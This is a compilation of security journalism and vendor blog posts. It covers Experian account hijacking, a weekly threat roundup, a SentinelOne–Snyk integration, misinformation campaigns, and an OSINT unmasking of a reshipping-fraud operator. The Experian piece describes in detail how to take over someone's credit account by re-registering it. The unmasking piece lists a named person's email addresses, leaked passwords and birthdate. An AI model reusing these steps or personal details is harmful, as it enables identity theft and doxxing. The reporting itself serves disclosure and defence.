We’d like to thank all of our sponsors, guest speakers, partner presenters, support staff, event organizers, and most of all, our attendees for an amazing OneCon23. From all of us at SentinelOne, we look forward to seeing you at next year’s event!

Contact us to learn more about what we are doing to evolve the cyber defense industry or book a demo to get more in-depth experience with our newest integrations and security offerings.

It’s Still Easy for Anyone to Become You at Experian

In the summer of 2022, KrebsOnSecurity documented the plight of several readers who had their accounts at big-three consumer credit reporting bureau Experian hijacked after identity thieves simply re-registered the accounts using a different email address. Sixteen months later, Experian clearly has not addressed this gaping lack of security. I know that because my account at Experian was recently hacked, and the only way I could recover access was by recreating the account.

Entering my SSN and birthday at Experian showed my identity was tied to an email address I did not authorize.

I recently ordered a copy of my credit file from Experian via annualcreditreport.com, but as usual Experian declined to provide it, saying they couldn’t verify my identity. Attempts to log in to my account directly at Experian.com also failed; the site said it didn’t recognize my username and/or password.

A request for my Experian account username required my full Social Security number and date of birth, after which the website displayed portions of an email address I never authorized and did not recognize (the full address was redacted by Experian).

I immediately suspected that Experian was still allowing anyone to recreate their credit file account using the same personal information but a different email address, a major authentication failure that was explored in last year’s story, Experian, You Have Some Explaining to Do. So once again I sought to re-register as myself at Experian.

The homepage said I needed to provide a Social Security number and mobile phone number, and that I’d soon receive a link that I should click to verify myself. The site claims that the phone number you provide will be used to help validate your identity. But it appears you could supply any phone number in the United States at this stage in the process, and Experian’s website would not balk. Regardless, users can simply skip this step by selecting the option to “Continue another way.”

Experian then asks for your full name, address, date of birth, Social Security number, email address and chosen password. After that, they require you to successfully answer between three to five multiple-choice security questions whose answers are very often based on public records. When I recreated my account this week, only two of the five questions pertained to my real information, and both of those questions concerned street addresses we’ve previously lived at — information that is just a Google search away.

Assuming you sail through the multiple-choice questions, you’re prompted to create a 4-digit PIN and provide an answer to one of several pre-selected challenge questions. After that, your new account is created and you’re directed to the Experian dashboard, which allows you to view your full credit file, and freeze or unfreeze it.

At this point, Experian will send a message to the old email address tied to the account, saying certain aspects of the user profile have changed. But this message isn’t a request seeking verification: It’s just a notification from Experian that the account’s user data has changed, and the original user is offered zero recourse here other than to a click a link to log in at Experian.com.

If you don’t have an Experian account, it’s a good idea to create one. Because at least then you will receive one of these  emails when someone hijacks your credit file at Experian.

And of course, a user who receives one of these notices will find that the credentials to their Experian account no longer work. Nor do their PIN or account recovery question, because those have been changed also. Your only option at this point is recreate your account at Experian and steal it back from the ID thieves!

In contrast, if you try to modify an existing account at either of the other two major consumer credit reporting bureaus — Equifax or TransUnion — they will ask you to enter a code sent to the email address or phone number on file before any changes can be made.

Reached for comment, Experian declined to share the full email address that was added without authorization to my credit file.

“To ensure the protection of consumers’ identities and information, we have implemented a multi-layered security approach, which includes passive and active measures, and are constantly evolving,” Experian spokesperson Scott Anderson said in an emailed statement. “This includes knowledge-based questions and answers, and device possession and ownership verification processes.”

Anderson said all consumers have the option to activate a multi-factor authentication method that’s requested each time they log in to their account. But what good is multi-factor authentication if someone can simply recreate your account with a new phone number and email address?

Several readers who spotted my rant about Experian on Mastodon earlier this week responded to a request to validate my findings. The Mastodon user @Jackerbee is a reader from Michican who works in the biotechnology industry. @Jackerbee said when prompted by Experian to provide his phone number and the last four digits of his SSN, he chose the option to “manually enter my information.”

“I put my second phone number and the new email address,” he explained. “I received a single email in my original account inbox that said they’ve updated my information after I ‘signed up.’ No verification required from the original email address at any point. I also did not receive any text alerts at the original phone number. The especially interesting and egregious part is that when I sign in, it does 2FA with the new phone number.”

The Mastodon user PeteMayo said they recreated their Experian account twice this week, the second time by supplying a random landline number.

“The only difference: it asked me FIVE questions about my personal history (last time it only asked three) before proclaiming, ‘Welcome back, Pete!,’ and granting full access,” @PeteMayo wrote. “I feel silly saving my password for Experian; may as well just make a new account every time.”

I was fortunate in that whoever hijacked my account did not also thaw my credit freeze.  Or if they did, they politely froze it again when they were done. But I fully expect my Experian account will be hijacked yet again unless Experian makes some important changes to its authentication process.

It boggles the mind that these fundamental authentication weaknesses have been allowed to persist for so long at Experian, which already has a horrible track record in this regard.

In December 2022, KrebsOnSecurity alerted Experian that identity thieves had worked out a remarkably simple way to bypass its security and access any consumer’s full credit report — armed with nothing more than a person’s name, address, date of birth, and Social Security number. Experian fixed the glitch, and acknowledged that it persisted for nearly seven weeks, between Nov. 9, 2022 and Dec. 26, 2022.

In April 2021, KrebsOnSecurity revealed how identity thieves were exploiting lax authentication on Experian’s PIN retrieval page to unfreeze consumer credit files. In those cases, Experian failed to send any notice via email when a freeze PIN was retrieved, nor did it require the PIN to be sent to an email address already associated with the consumer’s account.

A few days after that April 2021 story, KrebsOnSecurity broke the news that an Experian API was exposing the credit scores of most Americans.

More greatest hits from Experian:

2022: Class Action Targets Experian Over Account Security
2017: Experian Site Can Give Anyone Your Credit Freeze PIN
2015: Experian Breach Affects 15 Million Customers
2015: Experian Breach Tied to NY-NJ ID Theft Ring
2015: At Experian, Security Attrition Amid Acquisitions
2015: Experian Hit With Class Action Over ID Theft Service
2014: Experian Lapse Allowed ID Theft Service Access to 200 Million Consumer Records
2013: Experian Sold Consumer Data to ID Theft Service

The Good, the Bad and the Ugly in Cybersecurity – Week 45

The Good | Russian National Linked to Ryuk Ransomware Laundering Schemes Sanctioned By US Authorities

One of Ryuk ransomware’s many affiliates just had a target placed on their back by the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC). Ekaterina Zhdanova was sanctioned this week after being identified as a key player in laundering millions of dollars in cryptocurrency. Zhdanova leveraged her expertise in cryptocurrency and blockchain networks to circumvent anti-money laundering controls.

Zhdanova’s on-chain activity (Source: Chainalysis)

The OFAC and blockchain analysis experts highlight her use of a vast global network of money launderers to obscure her financial activities while expanding her clientele. Most notably, Zhdanova is believed to have aided the Ryuk ransomware operation, laundering over $2.3 million in suspected ransom payments for one of its known affiliates.

Ryuk ransomware operators made global headlines during the COVID-19 pandemic after extorting healthcare facilities for astronomical ransoms. Her work with the Ryuk affiliate involved the use of a fake investment account and real estate transactions to conceal the origins of the ransom payments.

A long list of malicious transactions follow Zhdanova. Authorities say that she has also been identified in helping Russian oligarchs evade Western sanctions set after Russia’s invasion of Ukraine. In addition, she facilitated the transfer of over $100 million for a Russian oligarch to the United Arab Emirates, orchestrating cases where her clients could obtain UAE tax residency, ID cards, and bank accounts.

Now, Zhdanova faces a freeze on all her U.S.-based assets, and U.S. individuals and entities are barred from transacting with her. This move underscores the U.S. government’s commitment to curbing money laundering activities, especially those linked to ransomware operations and the evasion of international sanctions.

The Bad | BlazeStealer Malware Hidden in Python Open-Source Packages Target Software Developers

Software developers are, once again, being targeted by threat actors through trojanized code libraries. Security research this week highlights at least eight developer tools published since January containing hidden payloads that are now reaching thousands of downloads.

So far, all eight in this series of packages have used Python programming language and are prefixed with the “pyobf” string to mimic genuine obfuscator tools like “pyobf2” and “pyobfuscator”. The latest in the string of malicious packages is called “pyobfgood”, which like its seven predecessors poses as a legitimate obfuscation tool for developers to defend against reverse engineering and code tampering.

Timeline of Python obfuscation traps (Source: Checkmarx)

In the case of the “pyobfgood” package, malware called BlazeStealer is installed as soon as the unsuspecting developer runs the code, giving the threat actor capabilities such as exfiltrating detailed host information, setting up keyloggers, stealing passwords from web browsers, downloading sensitive files, recording both screen and audio, and encrypting files for potential ransom. A list of the malicious package names and indicators of compromise may be found here.

Developers remain a lucrative target for threat actors, given their work with both sensitive and valuable information. Open-source libraries also continue to draw attention. In late September, a 10.0-level vulnerability in the LibWebP image library was exploited in the wild, and just last month a flaw found in curl, a widely-used open-source command-line tool, was described as one of the most serious bugs found in the tool for some time.

For now, the Biden administration and CISA have placed an open call out for support in securing the nation’s open-source software and have several ongoing security initiatives for the broader open-source ecosystem.

The Ugly | SaaS Analytics Firm Advise API Key Resets After AWS Account is Compromised

After evidence of a breach surfaced last Friday, Sumo Logic officially disclosed the incident this week, notifying users that its Amazon Web Services (AWS) account was compromised using stolen credentials. The Californian data analytics firm has confirmed that its systems, networks, and customer data remain unaffected.

Upon detection, Sumo Logic was able to lock down the exposed infrastructure and rotate all potentially compromised credentials. So far, the company has implemented additional security measures such as enhanced monitoring and vulnerability scanning to help prevent similar occurrences in the future. Continuous monitoring of network and system logs is also ongoing to identify any signs of additional malicious activity.

In response to the breach, Sumo Logic has advised its customers to rotate credentials used for accessing its services as well as those shared with the company for accessing other systems. Specifically, customers were urged to reset API access keys, Sumo Logic-installed collector credentials, third-party credentials stored for data collection purposes, and user passwords to Sumo Logic accounts.

While an investigation is ongoing, regular updates are being posted in the company’s Security Response Center. Sumo Logic has also pushed out a playbook instructing customers on how to update their API keys. Known for its cloud-native SaaS analytics platform, the firm offers log analytics, infrastructure monitoring, and cloud infrastructure security to over 2000 customers including 23andMe, GoFundMe, Mattel, and SEGA.

Threat actors continue to keep AWS accounts in their sights due to the wealth of sensitive data and critical services hosted on the platform. As a major cloud service provider, it is seen as a springboard into a vast number of businesses, government agencies, and high-profile organizations.

Announcing the Integration of SentinelOne CWPP with Snyk Container

SentinelOne is thrilled to announce general availability (GA) of the integration between our real-time, AI-powered cloud workload protection platform (CWPP) with Snyk Container. The integration and partnership helps cloud security practitioners, AppSec, and developers more seamlessly collaborate to streamline triage, stop the spread of security incidents for containerized workloads, and solve root cause of issues impacting production back in application source code.

Overview

When Singularity Cloud Workload Security, the real-time CWPP from SentinelOne, detects a runtime threat to a containerized workload running on cloud infrastructure, the threat details are automatically enriched with relevant context from Snyk Container about known vulnerabilities in the application code.

These vulnerability details are ingested from Snyk Container into the SentinelOne’s Singularity Data Lake in one of 2 ways: (1) via an API call to Snyk upon the runtime threat detection, and (2) optionally at a pre-defined cadence set by the customer.

By consolidating cloud security data from build and runtime, customers are better equipped to accelerate investigation and response. No more data silos, no more context switching, no more copy and paste. Instead, powerful context resides in one convenient location. Through the integration, our mutual customers can now:

  • Automatically correlate runtime threats to known container image vulnerabilities
  • Easily notify the source code owner
  • Better prioritize and fix source code vulnerabilities impacting production operations
  • Facilitate remediation of runtime issues at the workload source code

Getting Started

Phase 1 of the integration, in which runtime threat detections from SentinelOne are enriched with software vulnerabilities identified by Snyk, is available today to mutual customers. To get started, SentinelOne customers can navigate to the Singularity Marketplace from within the management console and search for Snyk.

As shown in Figure 1, select the Snyk app and install. This integration app will pull vulnerability details from the Snyk client into the Singularity Data Lake. Initial setup documentation can be found in the Knowledge Base document here.

Figure 1: Snyk in SentinelOne Singularity Marketplace
Figure 1: Snyk in SentinelOne Singularity Marketplace

The Value of Combining Runtime and Built Time Context

Knowing which workload vulnerabilities to fix first is a challenge. Keeping container images free of vulnerabilities can be difficult, as developers often lack visibility into the severity and associated risks of build-time vulnerabilities. Although users of Singularity Cloud Workload Security have visibility into container threats at runtime, they lack context about the vulnerabilities in container images, sometimes not even knowing who owns the workload’s source code. Without this build-time context, identifying the root cause of these threats can be difficult and time-consuming.

Solving the vulnerabilities at the source, in the source code, is ideal, as this prevents recurrence.

By enriching runtime threat detections from SentinelOne with vulnerabilities in the workload image identified by Snyk, cloud security, AppSec, and developers can collaborate better. They are better equipped to make informed decisions, put critical issues first, and better manage risk.

The enrichment of runtime threats with build-time context helps streamline triage, stop the spread, and solve issues impacting production right back at the source code.

Example: Runtime Threat, Build Time Context

In our example, we are running a container on a Kubernetes worker node. This node is part of a k8s cluster deployed on our managed k8s service, Amazon Elastic Kubernetes Service. Singularity Cloud Workload Security for Kubernetes has detected a runtime threat affecting our example containerized workload. More specifically, and as shown in Figure 2, both the Application Control and Behavioral AI Engines on the SentinelOne CWPP agent have triggered on a curl command.

Figure 2: Behavioral AI Threat Detection on a K8s Node
Figure 2: Behavioral AI Threat Detection on a K8s Node

After clicking into the incident for more detail, the user is presented with the details shown in Figure 3. Here we see that the CWPP agent has automatically assembled details relating to the threat indicators mapped to the MITRE ATT&CK TTPs, information on the Amazon EC2 instance which is running the container, as well as k8s context including container image information such as registry, repo, labels, and container ID.

Figure 3: Runtime Threat and K8s Context
Figure 3: Runtime Threat and K8s Context

With our integration with Snyk Container, SentinelOne automatically enriches these threat details with information from Snyk about vulnerabilities found in the workload image from which our container was instantiated.

As shown in Figure 4, Snyk has identified 377 vulnerabilities in the workload source code of varying severity, including five which are critical. A cloud security practitioner can include this information in a security ticket which they then route to the DevOps owner. The cloud security analyst and developer can easily pivot from the SentinelOne console to the Snyk Platform via a convenient deep link, to view the project details and fix the vulnerabilities at the source code.

Figure 4: Runtime Threat Enrichment with Build-Time Context from Snyk
Figure 4: Runtime Threat Enrichment with Build-Time Context from Snyk

Once the developer updates the code, rebuilds, and redeploys the image to the registry, a new container image can be launched from the clean image.

Better Cloud Security Outcomes

By correlating runtime threat detections by SentinelOne with vulnerability details identified by Snyk, cloud security practitioners can slash mean time to repair and more easily collaborate with AppSec and development teams to solve root cause in workload source code. The combination of SentinelOne Singularity Cloud Workload Security and Snyk Container help customers close the runtime-to-build-time feedback loop, to improve triage, prioritization, and create better cloud security outcomes.

To see how our two solutions work seamlessly together, check out this 2-minute guided walk-through. To learn more about the value of real-time CWPP in your cloud security stack, head over to the Singularity Cloud Workload Security homepage. And of course, whenever you are ready, you may connect with one of our cloud security experts for a personalized demo.

Join Our Webinar | Nov 16

SentinelOne and Snyk | Streamlining Cloud Incident Response, from Runtime to Build Time
Thursday, November 16 at 10:00 a.m. PST / 1:00 p.m. EST

The Truth Crisis | The Rising Threat of Online Misinformation and Disinformation

Access to the internet and social media platforms lies in the backpocket of nearly every user in the world. From a security point of view, one of the fastest rising concerns is how this level of connectivity is being used to spread discord and division both quickly and across huge numbers of users.

According to the latest global survey by the United Nations, more than 85% of people are concerned about the impact of disinformation. Some 87% believe that misinformation, disinformation, and malinformation (MDM) campaigns have already left a negative impact on their country’s politics and would play a significant part in future elections.

Since the consequences of MDM extend far beyond the digital realm, threat actors including nation-states, advanced persistent threat (APT) groups, cybercriminals, and hacktivists are increasingly turning to deceptive tactics to target victims and pursue their objectives.

This blog explores the evolving threat of MDM campaigns and their role in the cyber warfare arena, exposing the strategies used by threat actors and the risks posed to organizations, businesses, and society at large.

Misinformation Campaigns | The Snowball Effect of Mistakes & Fake News

Misinformation, often stemming initially from genuine mistakes or inaccuracies, has had a long and storied history. In the last two decades alone, several notable misinformation cases have threatened public safety:

  • Iraq War and Weapons of Mass Destruction (WMD) – In 2003, faulty and exaggerated reports of Iraq’s apparent possession of weapons of mass destruction, as promoted by some government officials and the media, played a significant role towards catalyzing the U.S.-led invasion of Iraq. Over the course of nine years, millions of displaced Iraqi victims, and a death toll numbering at 4500 American and 185,000 Iraqi lives, the Iraq War is still widely viewed as a foreign policy disaster.
  • Pizzagate – During the 2016 US presidential election cycle, one man’s personal email account was hacked in a spear phishing attack. After the emails were leaked, conspiracy theorists falsely claimed that they hid coded messages leading to an alleged human trafficking ring run by high-ranking Democratic party officials. After one pizzeria in Washington, D.C. was pinpointed as a trafficking establishment, an armed individual entered the pizzeria to “investigate” the claims, opening fire and threatening the employees.
  • COVID-19 Misinformation – Throughout the height of the COVID-19 pandemic, a barrage of fake news and misinformation circulated widely, impacting public health and security. Unfounded claims about the virus’s origins, treatments, and preventive measures have led to confusion, noncompliance with public health guidelines, and life-threatening consequences. Health misinformation directly contributes to the spread of disease and the cases seen during the pandemic highlighted the gaps in content checks on popular social media platforms.

Today, misinformation campaigns have evolved into a more sophisticated form, with threat actors purposefully exploiting the echo chambers of social media to propagate false information or “fake news”. The manipulation of algorithms, the use of deepfakes, and hijacking of “For You” pages (suggesting trending topics) have all contributed to an efficient spread of deceptive content.

Disinformation Campaigns | Sowing the Virtual Seeds of Discord

Disinformation campaigns work by deliberately spreading false information to deceive, manipulate, or sow discord. These campaigns target many at once, influencing elections, escalating geopolitical tensions, and creating real-world security threats. To date, state-sponsored actors, hacktivists, and criminal groups continue to conduct disinformation operations on a global scale through propaganda, political manipulation, and psychological warfare. Some notable examples include:

  • Russian Interference in U.S. Presidential Elections – During the 2016 election cycle, Russian state-sponsored actors leveraged social media to launch a multifaceted disinformation campaign to influence election outcomes and erode public confidence in the American government. This campaign raised concerns about national security and the resilience of democratic institutions against cyber threats. Foreign actors including Russia and Iran again attempted to interfere during the 2020 cycle by promoting false narratives about election fraud, aiming to undermine public trust in the democratic process.
  • Brexit and Scottish Independence Referendums – A U.S. Senate report in 2018 stated that Russia had sought to influence democracy in the United Kingdom through “disinformation, cyber hacking and corruption”, and that researchers had identified 150,000 Twitter accounts with various ties to Russia that disseminated messages about Brexit before the referendum, indicating “that the broader aim was to magnify societal discord”. In January 2023, the European Court of Human Rights sought a response from the British government to a legal claim that it had failed to properly investigate Russian interference in both the Brexit referendum and the 2014 Scottish referendum on independence. A 2020 British Intelligence and Security Committee was said by the same report to have found credible evidence Russia had tried to influence the Scottish referendum.
  • French Presidential Election – In the lead-up to the 2017 French presidential election, various state-sponsored and non-state actors launched disinformation campaigns to influence the election’s outcome. Spreading doctored tweets and emails, the actors attempted to threaten the security of the electoral process and public trust in specific electoral candidates.
  • Ongoing ​​Disinformation in the Russia-Ukraine War – Ukraine has been a hotspot for disinformation campaigns for several years, driven largely by Russia’s efforts to shape narratives, undermine the Ukrainian government, and influence events in the region. These campaigns, which claim Ukrainian aggression or exploit ethnic divisions within Ukraine for example, are part of a broader information warfare strategy that continues to be used to exploit political and social fault lines.

Malinformation | Branching Information Warfare Into Identity-Based Attacks

Malinformation campaigns are a more recent development in information warfare. These involve the release or distribution of truthful and legitimate private information for malicious intent. Malinformation often originates from data breaches or social engineering, where sensitive personal or corporate data is stolen or leaked and then published out of context. Victims of malinformation are then usually subject to doxxing, swatting, or other means of blackmail and harassment. These campaigns also harm organizations by publishing trade secrets, confidential data, or proprietary information. Infamous examples of malinformation cases are:

  • LinkedIn Data Breach – In 2012, a massive data breach exposed the passwords of millions of LinkedIn users. Many victims experienced extortion attempts when hackers threatened to reveal their compromised LinkedIn credentials unless a ransom was paid. Four years later, reports alleging the sale of the stolen credentials on the dark web surfaced, showing how potent breaches like this can be in both the short and long run.
  • GamerGate – A controversy that began in 2014 within the gaming industry but quickly escalated into a vicious online harassment campaign. Women and marginalized communities in the gaming industry were being targeted with doxxing, swatting threats, and harassment. The campaign highlighted the dark side of online communities and the impact of malinformation on personal security.
  • Political Doxxing During the Hong Kong Protests – During the pro-democracy/anti-government protests in Hong Kong in 2019, an unprecedented wave of doxxing campaigns targeted activists as well as police officers and journalists. Individuals on both sides of the protest line saw their private information (names, photos, ages, and occupations) shared across social media apps like Telegram.

MDM Tactics Move Into the Corporate World | How to Protect Enterprises & Organizations

In 2018, tech manufacturer Broadcom Inc. received a forged memo allegedly signed by the U.S. Department of Defense, asking for a review of their upcoming $19 billion dollar acquisition of CA Technologies by the The Committee on Foreign Investment in the United States (CFIUS). CFIUS is tasked with reviewing international deals for potential security risks to the nation. Since the acquisition of CA Technologies by Broadcom involved only American companies, the review has no basis, triggering suspicion.

Although quickly confirmed by the DoD to be fraudulent, the fake missive challenged national security measures in the public eye and caused both companies’ stocks to fall briefly. Examples like this show that the risks of MDM threats not only exist in geopolitical and social spheres, but the corporate sphere, too.

MDM threats in the corporate sector focus on causing brand and reputational damage, loss of customer trust, and both short and long-term financial losses. Disinformation-as-a-Service (DaaS) models, for example, allow malicious actors to purchase tailored MDM campaigns for their specific objectives. DaaS providers leverage a wide array of techniques, including creating and disseminating false narratives, manipulating online content, and conducting social engineering campaigns to achieve their goals.

Why Misinformation, Disinformation & Malinformation (MDM) Is a Cybersecurity Problem

MDM campaigns thrive off of connectivity and globalization to attack human perception both online and offline and have become a key component of modern information warfare. The intersection between MDM campaigns and cybersecurity can be examined across the following areas:

Terrain | Where Threat Actors Operate MDM Campaigns

While social media platforms often act as gateways and amplifiers for MDM campaigns, threat actors also leverage networking infrastructure and routing services to distribute malware, ransomware, and more to perform their malicious tasks. Disinformation and cybersecurity involve many of the same stakeholders within the private sector and the internet technical community.

Tools | Sharing the Same Methods of Attack

There is a substantial overlap between MDM and cybersecurity in terms of attack tools and methodologies. Much like in cyberattack strategies, MDM takes advantage by manipulating their victims’ anxieties and heightened emotions. For example, the deployment of “fearware”, a subset of phishing lures that thrived during the pandemic, preys on misinformation and information gaps. Further, disinformation campaigns and cybercrime tactics both dip into the realm of illegal dark web transactions, ill-got data and assets, and various forms of fraud.

Incentive | The ‘Why’ Behind MDM Campaigns

Hacking, cybercrime, and influence operations offer lucrative opportunities, often outsourced to skilled threat actors or cybercrime-as-a-service infrastructures. While individuals and businesses have increased their preparedness for ransomware attacks, MDM strategies like defamation and extortion are commonly used to inflict long-term reputational harm and secure a financial gain.

Applying Cybersecurity Lessons to Combat MDM Campaigns

Implementing robust cybersecurity practices play an important role in protecting organizations from a wide variety of threats. Cybersecurity practices are designed to identify and detect anomalies in data, network traffic, and user behavior. Advanced endpoint protection solutions can continuously monitor network traffic and identify suspicious patterns or deviations from the norm.

Ongoing monitoring is critical in the battle against MDM campaigns, particularly those feeding off public anxiety about current events. Cybersecurity teams continuously track information sources, social media channels, and online forums for signs of disinformation and misinformation. Automated tools and manual analysis help monitor the spread of false information and gauge its impact. Organizations can employ threat intelligence feeds and social listening tools to stay informed about emerging threats and campaigns.

Following cybersecurity best practices can also help to protect against harm caused by MDM campaigns. Effective best practices include implementing role-based access controls (RBAC), multi-factor authentication (MFA), encryption, and secure coding practices to safeguard information and data integrity. Cyber hygiene, such as regular software patching and updates, can also reduce any known vulnerabilities that malicious actors might exploit.

While cybersecurity best practices are essential, it is important to acknowledge that MDM campaigns are not solely a technical problem. These campaigns often involve psychological manipulation, social engineering, and the exploitation of cognitive biases. To secure from a user point of view, security awareness training educates employees about the risks of falling victim to disinformation campaigns, teaching them to recognize and report suspicious activities.

Conclusion

The evolving threat of MDM campaigns continues to tighten its grip on the digital landscape, impacting geopolitical, social, and corporate spheres. Waves of these campaigns have become a common occurrence in modern cyber warfare, where information is strategically weaponized to manipulate election outcomes, disrupt critical operations, and undermine public trust.

MDM campaigns are a symptom of the dynamic nature of our digital age. In this ongoing battle, knowledge, vigilance, and proactive measures are the best defense against the rising influence of MDM tactics and their role in the realm of cyber warfare.

As businesses navigate these developing threat tactics and techniques, adopting a multi-dimensional security strategy that combines robust preventive measures with XDR capabilities becomes a vital one. To learn more about how SentinelOne’s Singularity XDR can help defend your organization, book a demo or contact us today.

SentinelOne Singularity XDR
Supercharge. Fortify. Automate. Extend protection with unfettered visibility, proven protection, and unparalleled response.

Who’s Behind the SWAT USA Reshipping Service?

Last week, KrebsOnSecurity broke the news that one of the largest cybercrime services for laundering stolen merchandise was hacked recently, exposing its internal operations, finances and organizational structure. In today’s Part II, we’ll examine clues about the real-life identity of “Fearlless,” the nickname chosen by the proprietor of the SWAT USA Drops service.

Based in Russia, SWAT USA recruits people in the United States to reship packages containing pricey electronics that are purchased with stolen credit cards. As detailed in this Nov. 2 story, SWAT currently employs more than 1,200 U.S. residents, all of whom will be cut loose without a promised payday at the end of their first month reshipping stolen goods.

The current co-owner of SWAT, a cybercriminal who uses the nickname “Fearlless,” operates primarily on the cybercrime forum Verified. This Russian-language forum has tens of thousands of members, and it has suffered several hacks that exposed more than a decade’s worth of user data and direct messages.

January 2021 posts on Verified show that Fearlless and his partner Universalo purchased the SWAT reshipping business from a Verified member named SWAT, who’d been operating the service for years. SWAT agreed to transfer the business in exchange for 30 percent of the net profit over the ensuing six months.

Cyber intelligence firm Intel 471 says Fearlless first registered on Verified in February 2013. The email address Fearlless used on Verified leads nowhere, but a review of Fearlless’ direct messages on Verified indicates this user originally registered on Verified a year earlier as a reshipping vendor, under the alias “Apathyp.”

There are two clues supporting the conclusion that Apathyp and Fearlless are the same person. First, the Verified administrators warned Apathyp he had violated the forum’s rules barring the use of multiple accounts by the same person, and that Verified’s automated systems had detected that Apathyp and Fearlless were logging in from the same device.  Second, in his earliest private messages on Verified, Fearlless told others to contact him on an instant messenger address that Apathyp had claimed as his.

Intel 471 says Apathyp registered on Verified using the email address triploo@mail.ru. A search on that email address at the breach intelligence service Constella Intelligence found that a password commonly associated with it was “niceone.” But the triploo@mail.ru account isn’t connected to much else that’s interesting except a now-deleted account at Vkontakte, the Russian answer to Facebook.

However, in Sept. 2020, Apathyp sent a private message on Verified to the owner of a stolen credit card shop, saying his credentials no longer worked. Apathyp told the proprietor that his chosen password on the service was “12Apathy.”

A search on that password at Constella reveals it was used by just four different email addresses, two of which are particularly interesting: gezze@yandex.ru and gezze@mail.ru. Constella discovered that both of these addresses were previously associated with the same password as triploo@mail.ru — “niceone,” or some variation thereof.

Constella found that years ago gezze@mail.ru was used to create a Vkontakte account under the name Ivan Sherban (former password: “12niceone“) from Magnitogorsk, an industrial city in the southern region of Russia. That same email address is now tied to a Vkontakte account for an Ivan Sherban who lists his home as Saint Petersburg, Russia. Sherban’s profile photo shows a heavily tattooed, muscular and recently married individual with his beautiful new bride getting ready to drive off in a convertible sports car.

A pivotal clue for validating the research into Apathyp/Fearlless came from the identity intelligence firm myNetWatchman, which found that gezze@mail.ru at one time used the passwords “геззи1991” (gezze1991) and “gezze18081991.”

Care to place a wager on when Vkontakte says is Mr. Sherban’s birthday? Ten points if you answered August 18 (18081991).

Mr. Sherban did not respond to multiple requests for comment.